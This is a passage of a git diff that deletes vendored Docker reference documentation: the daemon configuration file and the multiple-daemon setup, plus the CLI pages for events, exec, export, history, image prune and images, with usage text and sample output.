-Please note that this feature is still marked as experimental as metrics and metric
-names could change while this feature is still in experimental.  Please provide
-feedback on what you would like to see collected in the API.
-
-## Daemon configuration file
-
-The `--config-file` option allows you to set any configuration option
-for the daemon in a JSON format. This file uses the same flag names as keys,
-except for flags that allow several entries, where it uses the plural
-of the flag name, e.g., `labels` for the `label` flag.
-
-The options set in the configuration file must not conflict with options set
-via flags. The docker daemon fails to start if an option is duplicated between
-the file and the flags, regardless their value. We do this to avoid
-silently ignore changes introduced in configuration reloads.
-For example, the daemon fails to start if you set daemon labels
-in the configuration file and also set daemon labels via the `--label` flag.
-Options that are not present in the file are ignored when the daemon starts.
-
-### Linux configuration file
-
-The default location of the configuration file on Linux is
-`/etc/docker/daemon.json`. The `--config-file` flag can be used to specify a
- non-default location.
-
-This is a full example of the allowed configuration options on Linux:
-
-```json
-{
-	"authorization-plugins": [],
-	"dns": [],
-	"dns-opts": [],
-	"dns-search": [],
-	"exec-opts": [],
-	"exec-root": "",
-	"experimental": false,
-	"storage-driver": "",
-	"storage-opts": [],
-	"labels": [],
-	"live-restore": true,
-	"log-driver": "",
-	"log-opts": {},
-	"mtu": 0,
-	"pidfile": "",
-	"graph": "",
-	"cluster-store": "",
-	"cluster-store-opts": {},
-	"cluster-advertise": "",
-	"max-concurrent-downloads": 3,
-	"max-concurrent-uploads": 5,
-	"shutdown-timeout": 15,
-	"debug": true,
-	"hosts": [],
-	"log-level": "",
-	"tls": true,
-	"tlsverify": true,
-	"tlscacert": "",
-	"tlscert": "",
-	"tlskey": "",
-	"swarm-default-advertise-addr": "",
-	"api-cors-header": "",
-	"selinux-enabled": false,
-	"userns-remap": "",
-	"group": "",
-	"cgroup-parent": "",
-	"default-ulimits": {},
-	"init": false,
-	"init-path": "/usr/libexec/docker-init",
-	"ipv6": false,
-	"iptables": false,
-	"ip-forward": false,
-	"ip-masq": false,
-	"userland-proxy": false,
-	"userland-proxy-path": "/usr/libexec/docker-proxy",
-	"ip": "0.0.0.0",
-	"bridge": "",
-	"bip": "",
-	"fixed-cidr": "",
-	"fixed-cidr-v6": "",
-	"default-gateway": "",
-	"default-gateway-v6": "",
-	"icc": false,
-	"raw-logs": false,
-	"registry-mirrors": [],
-	"seccomp-profile": "",
-	"insecure-registries": [],
-	"disable-legacy-registry": false,
-	"default-runtime": "runc",
-	"oom-score-adjust": -500,
-	"runtimes": {
-		"runc": {
-			"path": "runc"
-		},
-		"custom": {
-			"path": "/usr/local/bin/my-runc-replacement",
-			"runtimeArgs": [
-				"--debug"
-			]
-		}
-	}
-}
-```
-
-### Windows configuration file
-
-The default location of the configuration file on Windows is
- `%programdata%\docker\config\daemon.json`. The `--config-file` flag can be
- used to specify a non-default location.
-
-This is a full example of the allowed configuration options on Windows:
-
-```json
-{
-    "authorization-plugins": [],
-    "dns": [],
-    "dns-opts": [],
-    "dns-search": [],
-    "exec-opts": [],
-    "experimental": false,
-    "storage-driver": "",
-    "storage-opts": [],
-    "labels": [],
-    "log-driver": "",
-    "mtu": 0,
-    "pidfile": "",
-    "graph": "",
-    "cluster-store": "",
-    "cluster-advertise": "",
-    "max-concurrent-downloads": 3,
-    "max-concurrent-uploads": 5,
-    "shutdown-timeout": 15,
-    "debug": true,
-    "hosts": [],
-    "log-level": "",
-    "tlsverify": true,
-    "tlscacert": "",
-    "tlscert": "",
-    "tlskey": "",
-    "swarm-default-advertise-addr": "",
-    "group": "",
-    "default-ulimits": {},
-    "bridge": "",
-    "fixed-cidr": "",
-    "raw-logs": false,
-    "registry-mirrors": [],
-    "insecure-registries": [],
-    "disable-legacy-registry": false
-}
-```
-
-### Configuration reloading
-
-Some options can be reconfigured when the daemon is running without requiring
-to restart the process. We use the `SIGHUP` signal in Linux to reload, and a global event
-in Windows with the key `Global\docker-daemon-config-$PID`. The options can
-be modified in the configuration file but still will check for conflicts with
-the provided flags. The daemon fails to reconfigure itself
-if there are conflicts, but it won't stop execution.
-
-The list of currently supported options that can be reconfigured is this:
-
-- `debug`: it changes the daemon to debug mode when set to true.
-- `cluster-store`: it reloads the discovery store with the new address.
-- `cluster-store-opts`: it uses the new options to reload the discovery store.
-- `cluster-advertise`: it modifies the address advertised after reloading.
-- `labels`: it replaces the daemon labels with a new set of labels.
-- `live-restore`: Enables [keeping containers alive during daemon downtime](https://docs.docker.com/engine/admin/live-restore/).
-- `max-concurrent-downloads`: it updates the max concurrent downloads for each pull.
-- `max-concurrent-uploads`: it updates the max concurrent uploads for each push.
-- `default-runtime`: it updates the runtime to be used if not is
-  specified at container creation. It defaults to "default" which is
-  the runtime shipped with the official docker packages.
-- `runtimes`: it updates the list of available OCI runtimes that can
-  be used to run containers
-- `authorization-plugin`: specifies the authorization plugins to use.
-- `insecure-registries`: it replaces the daemon insecure registries with a new set of insecure registries. If some existing insecure registries in daemon's configuration are not in newly reloaded insecure resgitries, these existing ones will be removed from daemon's config.
-
-Updating and reloading the cluster configurations such as `--cluster-store`,
-`--cluster-advertise` and `--cluster-store-opts` will take effect only if
-these configurations were not previously configured. If `--cluster-store`
-has been provided in flags and `cluster-advertise` not, `cluster-advertise`
-can be added in the configuration file without accompanied by `--cluster-store`.
-Configuration reload will log a warning message if it detects a change in
-previously configured cluster configurations.
-
-
-## Running multiple daemons
-
-> **Note:** Running multiple daemons on a single host is considered as "experimental". The user should be aware of
-> unsolved problems. This solution may not work properly in some cases. Solutions are currently under development
-> and will be delivered in the near future.
-
-This section describes how to run multiple Docker daemons on a single host. To
-run multiple daemons, you must configure each daemon so that it does not
-conflict with other daemons on the same host. You can set these options either
-by providing them as flags, or by using a [daemon configuration file](#daemon-configuration-file).
-
-The following daemon options must be configured for each daemon:
-
-```bash
--b, --bridge=                          Attach containers to a network bridge
---exec-root=/var/run/docker            Root of the Docker execdriver
--g, --graph=/var/lib/docker            Root of the Docker runtime
--p, --pidfile=/var/run/docker.pid      Path to use for daemon PID file
--H, --host=[]                          Daemon socket(s) to connect to
---iptables=true                        Enable addition of iptables rules
---config-file=/etc/docker/daemon.json  Daemon configuration file
---tlscacert="~/.docker/ca.pem"         Trust certs signed only by this CA
---tlscert="~/.docker/cert.pem"         Path to TLS certificate file
---tlskey="~/.docker/key.pem"           Path to TLS key file
-```
-
-When your daemons use different values for these flags, you can run them on the same host without any problems.
-It is very important to properly understand the meaning of those options and to use them correctly.
-
-- The `-b, --bridge=` flag is set to `docker0` as default bridge network. It is created automatically when you install Docker.
-If you are not using the default, you must create and configure the bridge manually or just set it to 'none': `--bridge=none`
-- `--exec-root` is the path where the container state is stored. The default value is `/var/run/docker`. Specify the path for
-your running daemon here.
-- `--graph` is the path where images are stored. The default value is `/var/lib/docker`. To avoid any conflict with other daemons
-set this parameter separately for each daemon.
-- `-p, --pidfile=/var/run/docker.pid` is the path where the process ID of the daemon is stored. Specify the path for your
-pid file here.
-- `--host=[]` specifies where the Docker daemon will listen for client connections. If unspecified, it defaults to `/var/run/docker.sock`.
--  `--iptables=false` prevents the Docker daemon from adding iptables rules. If
-multiple daemons manage iptables rules, they may overwrite rules set by another
-daemon. Be aware that disabling this option requires you to manually add
-iptables rules to expose container ports. If you prevent Docker from adding
-iptables rules, Docker will also not add IP masquerading rules, even if you set
-`--ip-masq` to `true`. Without IP masquerading rules, Docker containers will not be
-able to connect to external hosts or the internet when using network other than
-default bridge.
-- `--config-file=/etc/docker/daemon.json` is the path where configuration file is stored. You can use it instead of
-daemon flags. Specify the path for each daemon.
-- `--tls*` Docker daemon supports `--tlsverify` mode that enforces encrypted and authenticated remote connections.
-The `--tls*` options enable use of specific certificates for individual daemons.
-
-Example script for a separate “bootstrap” instance of the Docker daemon without network:
-
-```bash
-$ sudo dockerd \
-        -H unix:///var/run/docker-bootstrap.sock \
-        -p /var/run/docker-bootstrap.pid \
-        --iptables=false \
-        --ip-masq=false \
-        --bridge=none \
-        --graph=/var/lib/docker-bootstrap \
-        --exec-root=/var/run/docker-bootstrap
-```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/events.md b/vendor/github.com/docker/docker/docs/reference/commandline/events.md
deleted file mode 100644
index baa966d620..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/events.md
+++ /dev/null
@@ -1,217 +0,0 @@
----
-title: "events"
-description: "The events command description and usage"
-keywords: "events, container, report"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# events
-
-```markdown
-Usage:  docker events [OPTIONS]
-
-Get real time events from the server
-
-Options:
-  -f, --filter value   Filter output based on conditions provided (default [])
-      --format string  Format the output using the given Go template
-      --help           Print usage
-      --since string   Show all events created since timestamp
-      --until string   Stream events until this timestamp
-```
-
-Docker containers report the following events:
-
-    attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, health_status, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update
-
-Docker images report the following events:
-
-    delete, import, load, pull, push, save, tag, untag
-
-Docker plugins report the following events:
-
-    install, enable, disable, remove
-
-Docker volumes report the following events:
-
-    create, mount, unmount, destroy
-
-Docker networks report the following events:
-
-    create, connect, disconnect, destroy
-
-Docker daemon report the following events:
-
-    reload
-
-The `--since` and `--until` parameters can be Unix timestamps, date formatted
-timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed
-relative to the client machine’s time. If you do not provide the `--since` option,
-the command returns only new and/or live events.  Supported formats for date
-formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`,
-`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local
-timezone on the client will be used if you do not provide either a `Z` or a
-`+-00:00` timezone offset at the end of the timestamp.  When providing Unix
-timestamps enter seconds[.nanoseconds], where seconds is the number of seconds
-that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap
-seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a
-fraction of a second no more than nine digits long.
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is of "key=value". If you would
-like to use multiple filters, pass multiple flags (e.g.,
-`--filter "foo=bar" --filter "bif=baz"`)
-
-Using the same filter multiple times will be handled as a *OR*; for example
-`--filter container=588a23dac085 --filter container=a8f7720b8c22` will display
-events for container 588a23dac085 *OR* container a8f7720b8c22
-
-Using multiple filters will be handled as a *AND*; for example
-`--filter container=588a23dac085 --filter event=start` will display events for
-container container 588a23dac085 *AND* the event type is *start*
-
-The currently supported filters are:
-
-* container (`container=<name or id>`)
-* event (`event=<event action>`)
-* image (`image=<tag or id>`)
-* plugin (experimental) (`plugin=<name or id>`)
-* label (`label=<key>` or `label=<key>=<value>`)
-* type (`type=<container or image or volume or network or daemon>`)
-* volume (`volume=<name or id>`)
-* network (`network=<name or id>`)
-* daemon (`daemon=<name or id>`)
-
-## Format
-
-If a format (`--format`) is specified, the given template will be executed
-instead of the default
-format. Go's [text/template](http://golang.org/pkg/text/template/) package
-describes all the details of the format.
-
-If a format is set to `{{json .}}`, the events are streamed as valid JSON
-Lines. For information about JSON Lines, please refer to http://jsonlines.org/ .
-
-## Examples
-
-You'll need two shells for this example.
-
-**Shell 1: Listening for events:**
-
-    $ docker events
-
-**Shell 2: Start and Stop containers:**
-
-    $ docker start 4386fb97867d
-    $ docker stop 4386fb97867d
-    $ docker stop 7805c1d35632
-
-**Shell 1: (Again .. now showing events):**
-
-    2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
-    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-**Show events in the past from a specified time:**
-
-    $ docker events --since 1378216169
-    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
-    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-    $ docker events --since '2013-09-03'
-    2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
-    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-    $ docker events --since '2013-09-03T15:49:29'
-    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
-    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-This example outputs all events that were generated in the last 3 minutes,
-relative to the current time on the client machine:
-
-    $ docker events --since '3m'
-    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
-    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-**Filter events:**
-
-    $ docker events --filter 'event=stop'
-    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-    $ docker events --filter 'image=ubuntu-1:14.04'
-    2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-
-    $ docker events --filter 'container=7805c1d35632'
-    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
-    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8)
-
-    $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d'
-    2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
-    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-    $ docker events --filter 'container=7805c1d35632' --filter 'event=stop'
-    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-    $ docker events --filter 'container=container_1' --filter 'container=container_2'
-    2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
-    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (imager=redis:2.8)
-    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
-
-    $ docker events --filter 'type=volume'
-    2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local)
-    2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate)
-    2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local)
-    2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local)
-
-    $ docker events --filter 'type=network'
-    2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge)
-    2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge)
-
-    $ docker events --filter 'type=plugin' (experimental)
-    2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest)
-    2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest)
-
-**Format:**
-
-    $ docker events --filter 'type=container' --format 'Type={{.Type}}  Status={{.Status}}  ID={{.ID}}'
-    Type=container  Status=create  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=attach  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=start  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=resize  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=die  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-    Type=container  Status=destroy  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
-
-**Format (as JSON Lines):**
-
-    $ docker events --format '{{json .}}'
-    {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
-    {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
-    {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e..
-    {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42..
-    {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/exec.md b/vendor/github.com/docker/docker/docs/reference/commandline/exec.md
deleted file mode 100644
index 38891c9ea0..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/exec.md
+++ /dev/null
@@ -1,65 +0,0 @@
----
-title: "exec"
-description: "The exec command description and usage"
-keywords: "command, container, run, execute"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# exec
-
-```markdown
-Usage:  docker exec [OPTIONS] CONTAINER COMMAND [ARG...]
-
-Run a command in a running container
-
-Options:
-  -d, --detach         Detached mode: run command in the background
-      --detach-keys    Override the key sequence for detaching a container
-  -e, --env=[]         Set environment variables
-      --help           Print usage
-  -i, --interactive    Keep STDIN open even if not attached
-      --privileged     Give extended privileges to the command
-  -t, --tty            Allocate a pseudo-TTY
-  -u, --user           Username or UID (format: <name|uid>[:<group|gid>])
-```
-
-The `docker exec` command runs a new command in a running container.
-
-The command started using `docker exec` only runs while the container's primary
-process (`PID 1`) is running, and it is not restarted if the container is
-restarted.
-
-If the container is paused, then the `docker exec` command will fail with an error:
-
-    $ docker pause test
-    test
-    $ docker ps
-    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                   PORTS               NAMES
-    1ae3b36715d2        ubuntu:latest       "bash"              17 seconds ago      Up 16 seconds (Paused)                       test
-    $ docker exec test ls
-    FATA[0000] Error response from daemon: Container test is paused, unpause the container before exec
-    $ echo $?
-    1
-
-## Examples
-
-    $ docker run --name ubuntu_bash --rm -i -t ubuntu bash
-
-This will create a container named `ubuntu_bash` and start a Bash session.
-
-    $ docker exec -d ubuntu_bash touch /tmp/execWorks
-
-This will create a new file `/tmp/execWorks` inside the running container
-`ubuntu_bash`, in the background.
-
-    $ docker exec -it ubuntu_bash bash
-
-This will create a new Bash session in the container `ubuntu_bash`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/export.md b/vendor/github.com/docker/docker/docs/reference/commandline/export.md
deleted file mode 100644
index 1004fc30c0..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/export.md
+++ /dev/null
@@ -1,43 +0,0 @@
----
-title: "export"
-description: "The export command description and usage"
-keywords: "export, file, system, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# export
-
-```markdown
-Usage:  docker export [OPTIONS] CONTAINER
-
-Export a container's filesystem as a tar archive
-
-Options:
-      --help            Print usage
-  -o, --output string   Write to a file, instead of STDOUT
-```
-
-The `docker export` command does not export the contents of volumes associated
-with the container. If a volume is mounted on top of an existing directory in
-the container, `docker export` will export the contents of the *underlying*
-directory, not the contents of the volume.
-
-Refer to [Backup, restore, or migrate data
-volumes](https://docs.docker.com/engine/tutorials/dockervolumes/#backup-restore-or-migrate-data-volumes) in
-the user guide for examples on exporting data in a volume.
-
-## Examples
-
-    $ docker export red_panda > latest.tar
-
-Or
-
-    $ docker export --output="latest.tar" red_panda
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/history.md b/vendor/github.com/docker/docker/docs/reference/commandline/history.md
deleted file mode 100644
index 00f88db35b..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/history.md
+++ /dev/null
@@ -1,48 +0,0 @@
----
-title: "history"
-description: "The history command description and usage"
-keywords: "docker, image, history"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# history
-
-```markdown
-Usage:  docker history [OPTIONS] IMAGE
-
-Show the history of an image
-
-Options:
-      --help       Print usage
-  -H, --human      Print sizes and dates in human readable format (default true)
-      --no-trunc   Don't truncate output
-  -q, --quiet      Only show numeric IDs
-```
-
-To see how the `docker:latest` image was built:
-
-    $ docker history docker
-    IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
-    3e23a5875458        8 days ago          /bin/sh -c #(nop) ENV LC_ALL=C.UTF-8            0 B
-    8578938dd170        8 days ago          /bin/sh -c dpkg-reconfigure locales &&    loc   1.245 MB
-    be51b77efb42        8 days ago          /bin/sh -c apt-get update && apt-get install    338.3 MB
-    4b137612be55        6 weeks ago         /bin/sh -c #(nop) ADD jessie.tar.xz in /        121 MB
-    750d58736b4b        6 weeks ago         /bin/sh -c #(nop) MAINTAINER Tianon Gravi <ad   0 B
-    511136ea3c5a        9 months ago                                                        0 B                 Imported from -
-
-To see how the `docker:apache` image was added to a container's base image:
-
-    $ docker history docker:scm
-    IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
-    2ac9d1098bf1        3 months ago        /bin/bash                                       241.4 MB            Added Apache to Fedora base image
-    88b42ffd1f7c        5 months ago        /bin/sh -c #(nop) ADD file:1fd8d7f9f6557cafc7   373.7 MB
-    c69cab00d6ef        5 months ago        /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar   0 B
-    511136ea3c5a        19 months ago                                                       0 B                 Imported from -
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md
deleted file mode 100644
index a80b8d38c8..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md
+++ /dev/null
@@ -1,71 +0,0 @@
----
-title: "image prune"
-description: "Remove all stopped images"
-keywords: "image, prune, delete, remove"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# image prune
-
-```markdown
-Usage:	docker image prune [OPTIONS]
-
-Remove unused images
-
-Options:
-  -a, --all     Remove all unused images, not just dangling ones
-  -f, --force   Do not prompt for confirmation
-      --help    Print usage
-```
-
-Remove all dangling images. If `-a` is specified, will also remove all images not referenced by any container.
-
-Example output:
-
-```bash
-$ docker image prune -a
-WARNING! This will remove all images without at least one container associated to them.
-Are you sure you want to continue? [y/N] y
-Deleted Images:
-untagged: alpine:latest
-untagged: alpine@sha256:3dcdb92d7432d56604d4545cbd324b14e647b313626d99b889d0626de158f73a
-deleted: sha256:4e38e38c8ce0b8d9041a9c4fefe786631d1416225e13b0bfe8cfa2321aec4bba
-deleted: sha256:4fe15f8d0ae69e169824f25f1d4da3015a48feeeeebb265cd2e328e15c6a869f
-untagged: alpine:3.3
-untagged: alpine@sha256:4fa633f4feff6a8f02acfc7424efd5cb3e76686ed3218abf4ca0fa4a2a358423
-untagged: my-jq:latest
-deleted: sha256:ae67841be6d008a374eff7c2a974cde3934ffe9536a7dc7ce589585eddd83aff
-deleted: sha256:34f6f1261650bc341eb122313372adc4512b4fceddc2a7ecbb84f0958ce5ad65
-deleted: sha256:cf4194e8d8db1cb2d117df33f2c75c0369c3a26d96725efb978cc69e046b87e7
-untagged: my-curl:latest
-deleted: sha256:b2789dd875bf427de7f9f6ae001940073b3201409b14aba7e5db71f408b8569e
-deleted: sha256:96daac0cb203226438989926fc34dd024f365a9a8616b93e168d303cfe4cb5e9
-deleted: sha256:5cbd97a14241c9cd83250d6b6fc0649833c4a3e84099b968dd4ba403e609945e
-deleted: sha256:a0971c4015c1e898c60bf95781c6730a05b5d8a2ae6827f53837e6c9d38efdec
-deleted: sha256:d8359ca3b681cc5396a4e790088441673ed3ce90ebc04de388bfcd31a0716b06
-deleted: sha256:83fc9ba8fb70e1da31dfcc3c88d093831dbd4be38b34af998df37e8ac538260c
-deleted: sha256:ae7041a4cc625a9c8e6955452f7afe602b401f662671cea3613f08f3d9343b35
-deleted: sha256:35e0f43a37755b832f0bbea91a2360b025ee351d7309dae0d9737bc96b6d0809
-deleted: sha256:0af941dd29f00e4510195dd00b19671bc591e29d1495630e7e0f7c44c1e6a8c0
-deleted: sha256:9fc896fc2013da84f84e45b3096053eb084417b42e6b35ea0cce5a3529705eac
-deleted: sha256:47cf20d8c26c46fff71be614d9f54997edacfe8d46d51769706e5aba94b16f2b
-deleted: sha256:2c675ee9ed53425e31a13e3390bf3f539bf8637000e4bcfbb85ee03ef4d910a1
-
-Total reclaimed space: 16.43 MB
-```
-
-## Related information
-
-* [system df](system_df.md)
-* [container prune](container_prune.md)
-* [volume prune](volume_prune.md)
-* [network prune](network_prune.md)
-* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/images.md b/vendor/github.com/docker/docker/docs/reference/commandline/images.md
deleted file mode 100644
index 3b9ea1fe17..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/images.md
+++ /dev/null
@@ -1,304 +0,0 @@
----
-title: "images"
-description: "The images command description and usage"
-keywords: "list, docker, images"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# images
-
-```markdown
-Usage:  docker images [OPTIONS] [REPOSITORY[:TAG]]
-
-List images
-
-Options:
-  -a, --all             Show all images (default hides intermediate images)
-      --digests         Show digests
-  -f, --filter value    Filter output based on conditions provided (default [])
-                        - dangling=(true|false)
-                        - label=<key> or label=<key>=<value>
-                        - before=(<image-name>[:tag]|<image-id>|<image@digest>)
-                        - since=(<image-name>[:tag]|<image-id>|<image@digest>)
-                        - reference=(pattern of an image reference)
-      --format string   Pretty-print images using a Go template
-      --help            Print usage
-      --no-trunc        Don't truncate output
-  -q, --quiet           Only show numeric IDs
-```
-
-The default `docker images` will show all top level
-images, their repository and tags, and their size.
-
-Docker images have intermediate layers that increase reusability,
-decrease disk usage, and speed up `docker build` by
-allowing each step to be cached. These intermediate layers are not shown
-by default.
-
-The `SIZE` is the cumulative space taken up by the image and all
-its parent images. This is also the disk space used by the contents of the
-Tar file created when you `docker save` an image.
-
-An image will be listed more than once if it has multiple repository names
-or tags. This single image (identifiable by its matching `IMAGE ID`)
-uses up the `SIZE` listed only once.
-
-### Listing the most recently created images
-
-    $ docker images
-    REPOSITORY                TAG                 IMAGE ID            CREATED             SIZE
-    <none>                    <none>              77af4d6b9913        19 hours ago        1.089 GB
-    committ                   latest              b6fa739cedf5        19 hours ago        1.089 GB
-    <none>                    <none>              78a85c484f71        19 hours ago        1.089 GB
-    docker                    latest              30557a29d5ab        20 hours ago        1.089 GB
-    <none>                    <none>              5ed6274db6ce        24 hours ago        1.089 GB
-    postgres                  9                   746b819f315e        4 days ago          213.4 MB
-    postgres                  9.3                 746b819f315e        4 days ago          213.4 MB
-    postgres                  9.3.5               746b819f315e        4 days ago          213.4 MB
-    postgres                  latest              746b819f315e        4 days ago          213.4 MB
-
-### Listing images by name and tag
-
-The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument
